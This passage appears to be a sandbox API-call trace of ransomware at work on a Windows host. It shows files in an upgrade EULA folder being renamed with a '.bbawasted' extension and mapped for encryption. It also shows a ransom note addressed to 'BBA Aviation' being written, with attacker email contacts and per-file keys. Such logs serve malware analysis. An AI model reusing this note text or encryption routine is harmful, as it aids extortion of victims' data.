(hFile=0x290) returned 1 [0235.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0235.334] CloseHandle (hObject=0x290) returned 1 [0235.335] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0235.335] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1088 | out: hHeap=0x660000) returned 1 [0235.335] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a60a8) returned 1 [0235.336] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0235.336] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0235.336] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm") returned 56 [0235.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0235.336] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0235.336] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6240) returned 1 [0235.337] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6ae598 | out: pbBuffer=0x6ae598) returned 1 [0235.337] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0235.337] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_da-dk.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0235.338] WriteFile (in: hFile=0x290, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.339] SetEndOfFile (hFile=0x290) returned 1 [0235.340] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0235.340] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_da-dk.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_da-dk.htm.bbawasted")) returned 1 [0235.342] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_da-dk.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0235.342] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0235.342] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xfe95 [0235.342] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfe95) returned 0x5f0000 [0235.342] CloseHandle (hObject=0x294) returned 1 [0235.404] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0235.405] CloseHandle (hObject=0x280) returned 1 [0235.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb88 [0235.405] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a68a0) returned 1 [0235.406] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x6adbd0 | out: pbBuffer=0x6adbd0) returned 1 [0235.406] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0235.406] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6680) returned 1 [0235.406] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0235.406] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0235.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb88 | out: hHeap=0x660000) returned 1 [0235.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.418] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Hw9k85W6Q2J46O9qFHrzpf4hdvFHcCW3y95O+hQ1RYiyinW868MV/YJnU7Fk8Wvs\r\nTttpeipYnTwa2VXVF7/YYJ/Lm2lumkqd58FLnZYerb3v4JGp7mc1zd0Fa9upjsJy\r\nsyz0E3ULnEfR3+hvzz2RhBH9o3XjHawVyUqo7G3AIgW/JSdRRFWQq2mcxkUZUG5a\r\nF3WIajiYsEkH2vaMJppSnxUxrlmhlhHZb3StlsNx1TdsUvgMKJAHMk4uxLTnH53g\r\nPreMnSYhSBV0hQxGDWxPnvv4U7BuYFOwiyBksLV6ROE3q+VS2zss8QSufOdse9Qt\r\nFn/CXF3iUk+msVAPMCiGgLwlyrMCIyH+O7fedWuFlVz6gToZHjpuJhyYsL1FZPfv\r\nGxTrribAvRniyTN++SoB85v6jwfNOkVXq5iUVLniNMY0POQaU6fm2vaYKF89uG22\r\nok3sxbRpr8qBIAdKWJrdTJDRbGbGjN2Krekc4pIvmrG6aWVMySrlyuFWrCrhPNJf\r\nHHduex+TCoqDmhCZjFBhLwUrNwbb1wBEi7NCqXMzFRPjim1kn7UjWrwVbHDHAgVG\r\nbSJ54AQZ6P0flVRUQfo4sXizmq6u2bnVvwZHtjInh/Cdndwy6K1e/Q2MgFOK1cpL\r\nY7rK8Zbs8YbjCT7a/Mw98YfVHo9te3kLFu2e/Net9M+=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.418] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0235.419] SetEndOfFile (hFile=0x290) returned 1 [0235.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.422] CloseHandle (hObject=0x290) returned 1 [0235.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0235.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c17d8 | out: hHeap=0x660000) returned 1 [0235.422] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a65f8) returned 1 [0235.423] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0235.423] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0235.423] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm") returned 56 [0235.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0235.423] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.423] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6240) returned 1 [0235.424] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.424] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0235.424] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_el-gr.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0235.428] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.429] SetEndOfFile (hFile=0x290) returned 1 [0235.429] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.429] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.429] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_el-gr.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_el-gr.htm.bbawasted")) returned 1 [0235.431] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_el-gr.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0235.431] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0235.431] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x3a756 [0235.431] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3a756) returned 0x1480000 [0235.431] CloseHandle (hObject=0x280) returned 1 [0235.564] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0235.567] CloseHandle (hObject=0x294) returned 1 [0235.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb88 [0235.567] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a68a0) returned 1 [0235.568] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x6adbd0 | out: pbBuffer=0x6adbd0) returned 1 [0235.568] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0235.568] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6570) returned 1 [0235.568] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0235.568] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0235.577] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.577] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb88 | out: hHeap=0x660000) returned 1 [0235.577] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.577] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]k/Tv+OGcINxIJe9XQeRZdA4xwG6of5x1e1aDDFANpQkXgTy4LQDcj4M+WlAKR2w+\r\nfyD/ivLRZTAw92FiLFAxEMf/axnDWT3Zu5BoSjO/BBQY5kKuFw8lZ9q24zovJFMR\r\nPEIOkmT7qpF1ZgsaKgWjS5wdPHqnadK0PnxKmvsm+4d0kOqh2BeukNJCjJFTEwGO\r\nfwR5xkJWloLbhEmxUTiM/XYzfl9uLFk8Tk75vMqpmJnpin25/ZdylGZMYfMABtVZ\r\n2ORp2cDxKp+n75crUIj3F9Mf234cay+sYx9gBHlOAT5Jcf641CargC69sm+dvmq9\r\nh8MVP+ruInKcqE2KaPus+xUPrILQfhyRPzeblaN8N0sPwRQzrPa/Leclm4ZoAnGM\r\ne0CQduD9S7ukXG7dxVOeOgqFHP94R3Yw7oUPLH45mAu6TNyL7CkcZEbSoLa8/8lI\r\nimeyduYElxFeavXixljh59kP0+891VCQriAsXTUxcrpOpjuTWUZrrBpq1UAo42vV\r\nNWhLz6NOH5HdObh5HE/1AIg2F64sxEN6ADRblzqdVR9Bvpt+SAcRgHcLUIdlva42\r\n0lz8sG0wE2+2WMflmNWz7WNvBqbxZZ78nJEVOU0ShSO0Vivc+BY1ijpLx+cwHbX0\r\neiAEbV9Kv0R2M9FYgzMheaLeawRlGsEvx2v0kz4brxk=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.577] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.577] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0235.578] SetEndOfFile (hFile=0x290) returned 1 [0235.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.580] CloseHandle (hObject=0x290) returned 1 [0235.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0235.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1568 | out: hHeap=0x660000) returned 1 [0235.581] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6460) returned 1 [0235.581] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0235.581] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0235.581] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm") returned 56 [0235.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0235.581] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.582] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a68a0) returned 1 [0235.582] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.582] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0235.582] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-es.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0235.583] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.584] SetEndOfFile (hFile=0x290) returned 1 [0235.584] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.584] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.584] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-es.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-es.htm.bbawasted")) returned 1 [0235.585] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-es.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0235.585] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0235.586] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x110b8 [0235.586] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x110b8) returned 0x600000 [0235.586] CloseHandle (hObject=0x294) returned 1 [0235.595] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0235.596] CloseHandle (hObject=0x280) returned 1 [0235.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb88 [0235.596] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6b48) returned 1 [0235.597] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x1b8, pbBuffer=0x6adbd0 | out: pbBuffer=0x6adbd0) returned 1 [0235.597] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0235.597] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5e88) returned 1 [0235.598] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0235.598] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0235.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.733] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb88 | out: hHeap=0x660000) returned 1 [0235.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.733] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Po/yMLCiALjTo4isj5fw05UmOCZfdTVAMAyywVpIL/C4gyPnNrxQRrj2u/2Q7NLf\r\nqz+N2D2RRrgXm4ZuehAELkrZvKk+Bsd5xOKE7jExDlV5TKBtxzsp8oQPTtR4sIpM\r\n1H02PJrBdDkVpyybaX7EuAF6L2ow2ouqx+7DWN3i/vkvYL9EvxQDKkXuQ0vfCy14\r\nkx8vkNUx1eft1vq/nlKHSVNPn20S/xwwdOd8ZfXn6zLAOZvdbhxXDuBJ0cS2nN2V\r\nwExm/Rignd0obH7bO0TfFnwhwS3bnODjd9wCAKpyTn2/cCFQkbSNbmRuZJNGTvLc\r\nkZFgK6Z18DcaBz0qs62n8xpeM9JlUns3fiVYXbx9qHQu7c34fr6U5kyhNkR04YtE\r\noRKflgxnGzsoF/zoD7fETrw4VN6OYjOhQN5xbtXpPpUEtx1Gj0kolDdw3dWXXT9Q\r\nnjFm9dxV/Vjux0Zq5Y/N8TV4PkmWeBc+yOmJAKy+zUkQT615FkFDwUoz4OQYjPI0\r\n7x23YBOowHh/TJf5Jc6Jq/KKwVDZiyV0IPviQ6umIXXlk7uhZ58Fz4nAxruNKsaC\r\ngzsfVA7GoAHkKwWAS96sJ6SPebipRn7oJDaLdfTvzQb162c2G9DlNL+r3RpmGuFS\r\nwsCywJMdomiw9x20CI0MYbX8HEN6nQ1hyF3QSJRvl6F=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.733] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.733] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0235.734] SetEndOfFile (hFile=0x290) returned 1 [0235.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.779] CloseHandle (hObject=0x290) returned 1 [0235.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0235.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1228 | out: hHeap=0x660000) returned 1 [0235.780] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6b48) returned 1 [0235.780] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0235.781] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0235.781] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm") returned 56 [0235.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0235.781] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.781] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a68a0) returned 1 [0235.782] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.782] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0235.782] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_et-ee.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0235.782] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.784] SetEndOfFile (hFile=0x290) returned 1 [0235.784] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.784] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.784] MoveFileW 